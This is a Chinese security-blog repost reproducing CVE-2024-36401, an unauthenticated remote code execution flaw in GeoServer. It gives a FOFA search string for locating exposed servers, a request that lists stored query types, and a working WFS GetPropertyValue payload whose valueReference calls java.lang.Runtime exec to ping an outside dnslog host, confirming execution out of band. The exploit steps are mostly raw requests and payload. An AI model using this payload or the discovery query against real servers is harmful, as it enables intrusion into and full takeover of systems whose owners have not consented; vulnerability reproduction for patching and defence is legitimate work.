Geoserver(CVE-2024-36401)RCE漏洞

admin 2024年7月3日13:23:46评论12 views字数 1107阅读3分41秒阅读模式
  • 漏洞描述

未经身份验证的用户可以通过向默认的 GeoServer 安装发送特制的输入,利用多个 OGC 请求参数,如 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求,从而执行任意代码。这种远程代码执行将导致系统被完全控制,严重威胁系统安全,可能造成数据泄露、勒索或更广泛的网络攻击。

  • 详情文档

阅读说明文档:https://www.osgeo.cn/geoserver-user-manual/services/wfs/reference.html#createstoredquery

  • 资产测绘
FOFA:app="GeoServer"
  • 复现过程

Geoserver(CVE-2024-36401)RCE漏洞

漏洞位置

Geoserver(CVE-2024-36401)RCE漏洞

POST请求中的相同示例:

Geoserver(CVE-2024-36401)RCE漏洞

要检索其他属性的值,请修改valueReference

请求头有两种

POST /wfs HTTP/1.1POST /geoserver/wfs HTTP/1.1

第一步查看ReturnFeatureType

POST /geoserver/wfs HTTP/1.1Host: xxxxxxContent-Type: application/xmlContent-Length: 101

<wfs:ListStoredQueries service='WFS' version='2.0.0' xmlns:wfs='http://www.xxx.net/wfs/2.0'/>

Geoserver(CVE-2024-36401)RCE漏洞

利用存在的ReturnFeatureType去替换<wfs:Query typeNames='topp:states'/>中的值

POST /wfs HTTP/1.1Host: ipContent-Type: application/xmlContent-Length: 334



<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.xxx.org/topp' xmlns:fes='http://www.xxx.net/fes/2.0' xmlns:wfs='http://www.xxx.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"ping 90mrqh.dnslog.cn")'>  <wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>

Geoserver(CVE-2024-36401)RCE漏洞

无回显命令,外带回显

Geoserver(CVE-2024-36401)RCE漏洞

原文始发于微信公众号(奉天安全团队):Geoserver(CVE-2024-36401)RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日13:23:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Geoserver(CVE-2024-36401)RCE漏洞https://cn-sec.com/archives/2913929.html

发表评论

匿名网友 填写信息